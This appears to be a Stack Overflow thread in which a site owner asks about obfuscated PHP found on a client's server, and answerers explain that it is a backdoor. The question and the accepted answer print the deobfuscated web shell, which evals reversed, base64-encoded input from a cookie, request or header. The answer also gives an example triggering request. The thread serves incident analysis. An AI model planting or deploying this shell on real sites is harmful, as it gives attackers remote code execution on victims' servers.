# What does this PHP code do? Looks like hacking

Tags: php, security

I found [this code](http://pastebin.com/EK9QSXzr) on the root of a client's site. I decrypted it to mean the following:

```
$brownies = create_function( ' ', eval(array_pop(func_get_args())); );

$brownies('L','9','$','>','','K','H','B','m', $i=array_merge($_REQUEST,$_COOKIE,$_SERVER); $a=isset($i["geccmscu"]) ? $i["geccmscu"] : (isset($i["HTTP_GECCMSCU"]) ? $i["HTTP_GECCMSCU"] : die ); eval(strrev(base64_decode(strrev($a)))););
```

It looks like it's getting code from the cookie or user and evaluating it, but I can't tell further from there.

Anyone have insight for this?

Comment: whatever it is, this isn't the complete code. It is missing such variables as the infamous `$a` that gets eval'd. I'm assuming that is an argument passed into a function and this is the body of said function. In that case, this would only be an issue if the function was being called. Edit: oops, sorry, I missed the link to the source. I'll check it out for you.

Comment: Um, $a is actually defined in that code. $a=isset($i["geccmscu"])

Answer (score 11, accepted):

Here the code with some indentation:

```
$brownies = create_function( ' ', eval(array_pop(func_get_args())); );

$brownies('L','9','$','>','','K','H','B','m',

$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);

$a=isset($i["geccmscu"]) ? $i["geccmscu"] :
    (isset($i["HTTP_GECCMSCU"]) ? $i["HTTP_GECCMSCU"] : die );

eval(strrev(base64_decode(strrev($a)))););
```

First it checks if among the cookies, request and server values (the `$i` variable), there is a "geccmscu" key. If not, it checks if a header with the same name is defined ("HTTP_GECCMSCU"). If not, the script stops there.

If that "geccmscu" variable was defined somewhere, it is stored in `$a`. The script then decodes it (the content is "encrypted" with strrev and base64) and executes it via `eval()`

Basically, someone could attack your server with an HTTP query such as this:

```
GET http://example.com?geccmscu=someevilphpcode
```

Then "someevilphpcode" will be decoded and executed on your server.

Comment: Not quite. `HTTP_*` variables get created from headers, not GET arguments. Same idea though.

Comment: @this.lau_ Very interesting =3

Comment: Any clues about this hack? name or keywords to find more info?

Comment: I got the same attack a few days ago in 2021, but the code was obfuscated. If I visit the website with a user agent of "Googlebot/2.1 (+http://www.google.com/bot.html). " I see viagra ads instead of my Wordpress blog. Which I assume it means that Google is indexing my site as spam. Of course, there's no relation between this injection code and how it was used to hijack my site.